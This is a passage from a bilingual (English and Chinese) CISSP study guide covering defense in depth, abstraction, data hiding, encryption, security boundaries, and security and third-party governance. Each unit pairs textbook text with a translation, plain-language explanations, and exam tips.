Similar elements are put into groups, classes, or roles that are collectively assigned security controls, restrictions, or permissions. Abstraction simplifies security by enabling you to assign security controls to a group of objects collected by type or function. Thus, the concept of abstraction is used when classifying objects or assigning roles to subjects. Abstraction is one of the fundamental principles behind the field known as object-oriented programming (OOP).

In OOP, the unknown environment doctrine states that users of an object (or operating system component) don't necessarily need to know the details of how the object works; they just need to know the proper syntax for using the object and the type of data that will be returned as a result (that is, how to send input and receive output). This is very much what's involved in mediated access to data or services, such as

中文直译 / 整理

安全控制措施是并联实施的,那么威胁可能通过一个未对其特定恶意活动进行检测 的检查点。 串行配置非常狭窄但深入,而并行配置则非常宽广但浅薄。 并行系统在分 布式计算应用中很有用,但在安全领域,并行性通常不是一个有用的概念。 在纵深防御的背景下,术语'层级'、'多层级'和'层'经常被使用。 此外,还有许多 其他与这一概念相关的术语,包括分类、区域、领域、隔间、孤岛、分段、格 子结构和保护环。 在本书中,你将频繁看到这些术语。 当你看到它们时,请结 合术语使用的上下文,思考纵深防御的概念。 广度防御或防御多样性也是与纵深防御相关的另一个重要概念。 如果 多个安全层的组件来自同一供应商或共享通用代码,可能会出现问题,因 为一个漏洞可能同时影响多个层。 使用来自不同供应商的多种安全产品, 可以显著降低或避免单一攻击同时破坏多个层的风险。 抽象 抽象 用于提高效率。 相似的元素被归入组、类或角色中,并统一分配安全控制、 限制或权限。 抽象通过将按类型或功能收集的对象组合作为整体分配安全控制, 从而简化了安全性。 因此,在对对象进行分类或为主体分配角色时,会使用抽 象的概念。 抽象是被称为面向对象编程(OOP)的领域的基本原理之一。

在 OOP 中,未 知环境原则指出,对象(或操作系统组件)的使用者并不一定需要了解对象的 工作细节; 他们只需要知道使用对象的正确语法以及作为结果返回的数据类型 (即如何发送输入和接收输出)。 这正是受控访问数据或服务所涉及的内容, 例如

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

对象、角色、组、接口都可能体现 abstraction。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 15 / PDF P92

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

when user-mode applications use system calls to request administrator-mode services or data (and such mediated access requests may be granted or denied depending on the requester's credentials and permissions) rather than obtaining direct, unmediated access. (See the “Protection Rings” section of Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures,” for more on the topic of mediated access.) Another way in which abstraction applies to security is the introduction of object groups, sometimes called classes, where access controls and operation rights are assigned to groups of objects rather than on a per-object basis.

This approach allows security administrators to define and name groups easily (the names are often related to job roles or responsibilities) and helps make the administration of rights and privileges easier (when you add an object to a class, you confer rights and privileges rather than having to manage rights and privileges for each object separately). Data Hiding Data hiding is preventing data from being discovered or accessed by a subject by positioning the data in a logical storage compartment that is not accessible to nor seen by the subject. This means the subject cannot see or access the data, not just that it is unseen.

Data hiding includes keeping a database from being accessed by unauthorized visitors and restricting a subject at a lower classification level from accessing data at a higher classification level. Preventing an application from accessing hardware directly is also a form of data hiding. Data hiding is often a key element in security controls as well as in programming. Steganography is an example of data hiding (see Chapter 7). Data hiding is a vital characteristic in multilevel secure systems. It ensures that data existing at one level of security is not visible to processes running at different security levels.

From a security perspective, data hiding relies on placing objects in security containers different from those that subjects occupy to hide object details from those without the need to know about them or the means to access them. The term security through obscurity may seem relevant here. However, that concept is different. Data hiding is intentionally positioning data so that it is not viewable or accessible to an unauthorized subject, whereas security through obscurity is the idea of not informing a subject about an object being present and thus hoping that the subject will not discover the object. In other words, in security through obscurity, the subject could access the data if they

中文直译 / 整理

当用户模式应用程序使用系统调用来请求管理员模式的服务或数据(此类受控 访问请求可能根据请求者的凭据和权限被授予或拒绝),而不是获得直接、非 受控的访问。 (有关受控访问主题的更多内容,请参见第 9 章“安全漏洞、威 胁与对策”中的“保护环”部分。 ) 抽象在安全中的另一种应用是引入对象组,有时称为类,其中访问控制和操作 权限被分配给对象组,而不是基于单个对象。 这种方法使安全管理员能够轻松 地定义和命名组(这些名称通常与工作角色或职责相关),并有助于简化权限 和特权的管理(当您将一个对象添加到一个类时,您会赋予其权限和特权,而 无需分别为每个对象管理权限和特权)。 数据隐藏 数据隐藏是指通过将数据放置在主体无法访问或无法看到的逻辑存储单元中, 从而防止主体发现或访问数据。 这意味着主体既不能看到数据,也不能访问数 据,而不仅仅是数据不可见。 数据隐藏包括防止未经授权的访问者访问数据库, 以及限制较低分类级别的主体访问较高分类级别的数据。 防止应用程序直接访问硬件也是一种数据隐藏形式。 数据隐藏通常是安全控制 以及编程中的关键要素。 隐写术是数据隐藏的一个例子(见第7章)。 数据隐藏是多级安全系统中的关键特性。

它确保处于某一安全级别的数据对运 行在不同安全级别上的进程不可见。 从安全角度来看,数据隐藏依赖于将对象 置于与主体不同的安全容器中,以隐藏那些无需知晓或无法访问这些对象细节 的信息。 术语 通过隐蔽实现安全 在此处可能看似相关。 然而,这一概念是不同的。 数据 隐藏是故意将数据定位为未经授权的主体无法查看或访问,而通过隐蔽实现安 全则是指不告知主体某个对象的存在,从而希望该主体不会发现该对象。 换句 话说,在通过隐蔽实现安全中,如果主体能够

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

数据隐藏:数据隐藏减少不必要暴露,但不等于加密。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

对象、角色、组、接口都可能体现 abstraction。

隐藏是少暴露;加密是即使看到也读不懂。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
数据隐藏 数据隐藏减少不必要暴露,但不等于加密。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 16 / PDF P93

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

find it. It is digital hide and seek. Security through obscurity does not actually implement any form of protection. It is instead an attempt to hope something important is not discovered by keeping knowledge of it a secret. An example of security though obscurity is when a programmer is aware of a flaw in their software code, but they release the product anyway hoping that no one discovers the issue and exploits it. Encryption Encryption is the science of hiding the meaning or intent of a communication from unintended recipients. Encryption can take many forms and should be applied to every type of electronic communication and storage. Encryption is discussed at length in Chapters 6 and 7.

Security Boundaries A security boundary is the line of intersection between areas, subnets, or environments with different security requirements or needs. A security boundary exists between high-security and low-security areas, such as between a LAN (local area network) and the Internet. Recognizing the security boundaries on your network and in the physical world is essential to establishing reliable security barriers. Once you identify a security boundary, you must deploy mechanisms to control the flow of information across that boundary. Divisions between security areas can take many forms. For example, objects may have different classifications.

Each classification defines which subjects can perform functions on which objects. The distinction between classifications is a security boundary. Security boundaries also exist between the physical environment and the logical environment. To provide logical security, you must provide security mechanisms different from those used to provide physical security. Both must be present to provide a complete security structure, and both must be addressed in a security policy. However, they are different and must be assessed as separate elements of a security solution. Security boundaries, such as a perimeter between protected and unprotected areas, should always be clearly defined.

In a security policy, it's important to state the point at which control ends or begins and to identify that point in both the physical and logical environments. Logical security boundaries are

中文直译 / 整理

找到它,就可以访问数据。 这就像数字版的捉迷藏。 通过隐蔽实现安全实际上 并未实施任何形式的保护,而只是试图通过保密其存在来希望重要信息不被发 现。 一个通过隐蔽实现安全的例子是,程序员意识到其软件代码中存在缺陷, 但仍发布产品,希望没有人发现并利用该问题。 加密 加密是隐藏通信含义或意图以防止非预期接收者获取的科学。 加密可以采取多 种形式,应应用于所有类型的电子通信和存储。 加密在第6章和第7章中进行了 详细讨论。 安全边界 安全边界是具有不同安全需求或要求的区域、子网或环境之间的交界线。 安全 边界存在于高安全性区域与低安全性区域之间,例如局域网(LAN)与互联网 之间。 识别网络和物理世界中的安全边界对于建立可靠的安全屏障至关重要。 一旦确定了安全边界,就必须部署机制以控制信息跨越该边界流动。 安全区域之间的划分可以采取多种形式。 例如,对象可能具有不同的分类。 每 个分类定义了哪些主体可以对哪些对象执行操作。 分类之间的区别即为安全边 界。 安全边界也存在于物理环境与逻辑环境之间。 为提供逻辑安全,必须部署不 同于物理安全所用机制的安全措施。 两者均需存在,以构成完整的安全结构, 且两者都必须在安全策略中予以考虑。

然而,它们是不同的,必须作为安全 解决方案中的独立要素进行评估。 安全边界,例如受保护区域与非受保护区域之间的边界,应始终明确界定。 在 安全策略中,重要的是明确说明控制的终止或起始点,并在物理和逻辑环境中 标识该点。 逻辑安全边界是

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 17 / PDF P94

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

where electronic communications interface with devices or services for which your organization is legally responsible. In most cases, that interface is clearly marked, and unauthorized subjects are informed that they do not have access, and that attempts to gain access will result in prosecution. The security perimeter in the physical environment often reflects the security perimeter of the logical environment. In most cases, the area for which the organization is legally responsible determines the reach of a security policy in the physical realm. This can be the walls of an office, the walls of a building, or the fence around a campus.

In secured environments, warning signs are posted indicating that unauthorized access is prohibited and that attempts to gain access will be thwarted and result in prosecution. When transforming a security policy into actual controls, you must consider each environment and security boundary separately. Simply deduce what available security mechanisms would provide the most reasonable, costeffective, and efficient solution for a specific environment and situation. However, all security mechanisms must be weighed against the value of the objects they are to protect. Deploying countermeasures that cost more than the value of the protected objects is unwarranted.

Evaluate and Apply Security Governance Principles Security governance is the collection of practices related to supporting, evaluating, defining, and directing an organization's security efforts. Optimally, security governance is performed by a board of directors or governance committee, but smaller organizations may have the chief executive officer (CEO) or chief information security officer (CISO) perform the activities of security governance. Security governance seeks to compare the security processes and infrastructure used within the organization with knowledge and insight obtained from external sources.

This is why a board of directors often consists of people from various backgrounds and industries. The board members can bring their varied experience and wisdom to guide the improvement of the organization they oversee. Security governance principles are closely related to and often intertwined with corporate and IT governance. The goals of these three governance agendas are often the same or interrelated, such as maintaining business processes while striving toward growth and resiliency.

中文直译 / 整理

电子通信与您的组织负有法律责任的设备或服务进行交互的地方。 在大多数情 况下,该接口会明确标记,未经授权的主体将被告知其无权访问,且任何试图 获取访问权限的行为都将导致起诉。 物理环境中的安全边界通常反映了逻辑环境中的安全边界。 在大多数情况下, 组织负有法律责任的区域决定了安全策略在物理领域内的覆盖范围。 这可能是 办公室的墙壁、建筑物的墙壁,或校园周围的围栏。 在受保护的环境中,会张 贴警告标志,表明未经许可的访问被禁止,任何试图获取访问权限的行为都将 被阻止,并可能导致起诉。 在将安全策略转化为实际控制措施时,您必须分别考虑每种环境和安全边界。 只需推断出哪些可用的安全机制能为特定环境和情况提供最合理、成本效益最 高且最高效的解决方案即可。 然而,所有安全机制都必须与其所要保护对象的 价值进行权衡。 部署成本超过受保护对象价值的应对措施是不合理的。 评估并应用安全治理原则 安全治理 是指与支持、评估、定义和指导组织安全工作相关的各种实践。 理想 情况下,安全治理由董事会或治理委员会执行,但较小的组织可能由首席执行 官(CEO)或首席信息安全部门官(CISO)来执行安全治理的相关活动。

安 全治理旨在将组织内部使用的安全流程和基础设施与从外部来源获得的知识和 见解进行比较。 这就是为什么董事会通常由来自不同背景和行业的人士组成。 董事会成员可以凭借其多样化的经验和智慧,指导其所监督组织的改进。 安全治理原则与企业治理和IT治理密切相关且常常交织在一起。 这三项治理 议程的目标往往相同或相互关联,例如在追求增长和韧性的同时保持业务流 程。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

授权:授权是认证之后决定你能访问什么、能做什么。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

认证成功不等于什么都能做;权限仍要单独授权。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

CISO 需要足够独立性和高层支持。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
授权 授权是认证之后决定你能访问什么、能做什么。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P95

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

Some aspects of governance are imposed on organizations due to legislative and regulatory compliance needs, whereas industry guidelines or license requirements impose others. All forms of governance, including security governance, must be assessed and verified from time to time. Various requirements for auditing and validation may be present due to government regulations or industry best practices. This is especially problematic when laws in different countries differ or, in fact, conflict.

The organization as a whole should be given the direction, guidance, and tools to provide sufficient oversight and management to address threats and risks, with a focus on eliminating downtime and keeping potential loss or damage to a minimum. As you can tell, the definitions of security governance are often rather stilted and high-level. Ultimately, security governance is the implementation of a security solution and a management method that are tightly interconnected. Security governance directly oversees and gets involved in all levels of security. Security is not and should not be treated as an IT issue only. Instead, security affects every aspect of an organization.

Security is a business operations issue. Security is an organizational process, not just something the IT geeks do behind the scenes. Using the term security governance is an attempt to emphasize this point by indicating that security needs to be managed and governed throughout the organization, not just in the IT department. There are numerous security frameworks and governance guidelines, including the National Institute of Standards and Technology (NIST) SP 800- 53 and NIST SP 800-100. Although the NIST guidance is focused on government and military use, it can be adopted and adapted by other types of organizations as well.

Many organizations adopt security frameworks in an effort to standardize and organize what can become a complex and bewilderingly messy activity, namely, attempting to implement reasonable security governance. Third-Party Governance Third-party governance is the system of external entity oversight that law, regulation, industry standards, contractual obligation, or licensing requirements may mandate. The actual method of governance may vary, but it generally involves an outside investigator or auditor. A governing body might designate these auditors or might be consultants hired by the target organization.

中文直译 / 整理

某些治理方面是由于立法和监管合规需求而强加给组织的,而行业指南或许可 要求则施加了其他方面。 所有形式的治理,包括安全治理,都必须定期进行评 估和验证。 由于政府法规或行业最佳实践,可能存在各种审计和验证要求。 当 不同国家的法律存在差异甚至冲突时,这一问题尤为突出。 整个组织应获得方 向、指导和工具,以提供充分的监督和管理,应对威胁和风险,重点是消除停 机时间,并将潜在损失或损害降至最低。 正如你所知,安全治理的定义往往显得生硬且高度抽象。 最终,安全治理是实 施一个紧密关联的安全解决方案和管理方法。 安全治理直接监督并参与所有层 级的安全工作。 安全并非也不应仅被视为一个IT问题。 相反,安全影响组织的 各个方面。 安全是一项业务运营问题,是一种组织流程,而不仅仅是IT技术人 员在幕后所做的事情。 使用安全治理这一术语,旨在强调这一点,即安全需要 在整个组织中得到管理和治理,而不仅仅局限于IT部门。 存在许多安全框架和治理指南,包括国家标准与技术研究院(NIST)的SP 800‑53和NIST SP 800‑100。 尽管NIST的指导主要针对政府和军事用途,但其 他类型的组织也可以采用并调整这些指南。

许多组织采用安全框架,旨在标准 化和组织那些可能变得复杂且混乱的活动,即尝试实施合理的安全治理。 第三方治理 第三方治理是指由法律、法规、行业标准、合同义务或许可要求所强制规定的 外部实体监督体系。 治理的实际方式可能有所不同,但通常涉及外部调查员或 审计员。 治理机构可能指定这些审计员,也可能由目标组织聘请的顾问担任。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

审计:审计记录主体行为,用于追责、复盘和取证。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

第三方治理:外包出去不等于责任也外包出去,组织仍要监督供应商。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

没有日志和身份绑定,就很难问责。

对象、角色、组、接口都可能体现 abstraction。

合同、SLA、审计报告、现场评估、持续监控是高频点。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
审计 审计记录主体行为,用于追责、复盘和取证。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
第三方治理 外包出去不等于责任也外包出去,组织仍要监督供应商。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 19 / PDF P96

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Another aspect of third-party governance is the application of security oversight to third parties that your organization relies on. Many organizations choose to outsource various aspects of their business operations. Outsourced operations can include security guards, maintenance, technical support, and accounting services. These parties must comply with the primary organization's security stance. Otherwise, they present additional risks and vulnerabilities to the primary organization. Third-party governance focuses on verifying compliance with stated security objectives, requirements, regulations, and contractual obligations.

On-site assessments can provide firsthand exposure to the security mechanisms employed at a location. Those performing on-site assessments or audits must follow auditing protocols (such as Control Objectives for Information and Related Technologies [COBIT]) and have a specific checklist of requirements to investigate. In the auditing and assessment process, both the target and the governing body should participate in full and open document exchange and review. An organization needs to know the full details of all requirements it must comply with. The organization should submit security policy and self-assessment reports back to the governing body.

This open document exchange ensures that all parties involved agree about all the issues of concern. It reduces the chances of unknown requirements or unrealistic expectations. Document exchange does not end with the transmission of paperwork or electronic files. Instead, it leads to the process of documentation review. See Chapter 12, “Secure Communications and Network Attacks,” for a discussion of third-party connectivity. Documentation Review Documentation review is the process of reading the exchanged materials and verifying them against standards and expectations. The documentation review is typically performed before any on-site inspection takes place.

If the exchanged documentation is sufficient and meets expectations (or at least requirements), then an on-site review will be able to focus on compliance with the stated documentation. However, if the documentation is incomplete, inaccurate, or otherwise insufficient, the on-site review is postponed until the documentation can be updated and corrected. This step is important because if the documentation is not in compliance, the location will likely not be in compliance either.

中文直译 / 整理

第三方治理的另一个方面是对贵组织所依赖的第三方实施安全监督。 许多组织 选择将业务运营的各个方面外包。 外包的运营可能包括安保人员、维护、技术 支持和会计服务。 这些第三方必须遵守主组织的安全立场。 否则,它们将为主 组织带来额外的风险和漏洞。 第三方治理侧重于验证是否符合既定的安全目标、要求、法规和合同义务。 现 场评估可提供对地点所采用安全机制的直接了解。 执行现场评估或审计的人员 必须遵循审计协议(如信息及相关技术控制目标 [COBIT]),并拥有特定的检 查清单以进行调查。 在审计和评估过程中,目标方和监管机构应参与全面且公开的文件交换与审查。 组织需要了解其必须遵守的所有要求的详细信息。 组织应将安全政策和自评报 告提交给监管机构。 这种公开的文件交换确保所有相关方对所有关注问题达成 一致,降低了未知要求或不切实际期望的可能性。 文件交换不仅限于纸质文件 或电子文件的传输,而是引向文档审查过程。 参见 第12章,“安全通信与网络攻击”,了解第三方连接的讨论。 文档审查 文档审查是阅读交换的材料并将其与标准和期望进行核对的过程。 文档审查通 常在任何现场检查之前进行。

如果交换的文档足够且符合期望(或至少满足要 求),则现场审查将能够集中于对所陈述文档的合规性检查。 然而,如果文档 不完整、不准确或以其他方式不足,则现场审查将被推迟,直至文档得到更新 和修正。 这一步骤非常重要,因为如果文档不符合要求,该地点也很可能不符 合要求。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

第三方治理:外包出去不等于责任也外包出去,组织仍要监督供应商。

COBIT:COBIT 偏 IT 治理和控制目标。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

合同、SLA、审计报告、现场评估、持续监控是高频点。

COBIT 常用于治理、控制、审计和业务价值。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
第三方治理 外包出去不等于责任也外包出去,组织仍要监督供应商。
COBIT COBIT 偏 IT 治理和控制目标。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 20 / PDF P97

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

In many situations, especially those related to government or military agencies or contractors, failing to provide sufficient documentation to meet requirements of third-party governance can result in a loss of or a voiding of authorization to operate (ATO). Complete and sufficient documentation can often maintain existing ATOs or provide a temporary ATO (TATO). However, once an ATO is lost or revoked, complete documentation and on-site review showing full compliance are usually necessary to reestablish the ATO.

A portion of the documentation review is the logical and practical investigation of the business processes and organizational policies in light of standards, frameworks, and contractual obligations. This review ensures that the stated and implemented business tasks, systems, and methodologies are practical, efficient, and cost-effective, and most of all (at least in relation to security governance) that they support the goal of security through the reduction of vulnerabilities and the avoidance, reduction, or mitigation of risk. Managing, assessing, and addressing risk are all methods and techniques involved in performing process/policy review.

Manage the Security Function The security function is the aspect of operating a business that focuses on the task of evaluating and improving security over time. To manage the security function, an organization must implement proper and sufficient security governance. The act of performing a risk assessment to drive the security policy is the clearest and most direct example of management of the security function. The process of risk assessment is discussed in Chapter 2. Security must be measurable. Measurable security means that the various aspects of the security mechanisms function, provide a clear benefit, and have one or more metrics that can be recorded and analyzed.

Similar to performance metrics, security metrics are measurements of performance, function, operation, action, and so on as related to the operation of a security feature. When a countermeasure or safeguard is implemented, security metrics should show a reduction in unwanted occurrences or an increase in the detection of attempts. The act of measuring and evaluating security metrics is the practice of assessing the completeness and effectiveness of the security program. This should also include measuring it against common security guidelines and tracking the success of its controls. Tracking and assessing security metrics is part of effective security governance.

中文直译 / 整理

在许多情况下,特别是涉及政府或军事机构或承包商时,未能提供足够的文档 以满足第三方治理的要求,可能导致运营授权(ATO)的丧失或失效。 完整且 充分的文档通常可以维持现有的ATO,或提供临时ATO(TATO)。 然而,一 旦ATO被丧失或撤销,通常需要完整的文档和现场审查以证明完全合规,才能 重新建立ATO。 文档审查的一部分是对业务流程和组织政策根据标准、框架和合同义务进行的 逻辑与实际调查。 此审查确保所陈述和实施的业务任务、系统和方法是实用、 高效且成本效益高的,最重要的是(至少在安全治理方面)它们通过减少漏洞 以及避免、减少或缓解风险来支持安全目标。 管理、评估和应对风险都是执行 流程/政策审查所涉及的方法和技术。 管理安全职能 安全职能是业务运营中专注于评估和随着时间推移改进安全性的方面。 要管理 安全职能,组织必须实施适当且充分的安全治理。 通过风险评估来驱动安全策略的行为,是管理安全职能最清晰、最直接的 示例。 风险评估的过程将在第2章中讨论。 安全必须是可衡量的。 可衡量的安全意味着安全机制的各个方面能够正常运行、 提供明确的益处,并具备一个或多个可记录和分析的指标。

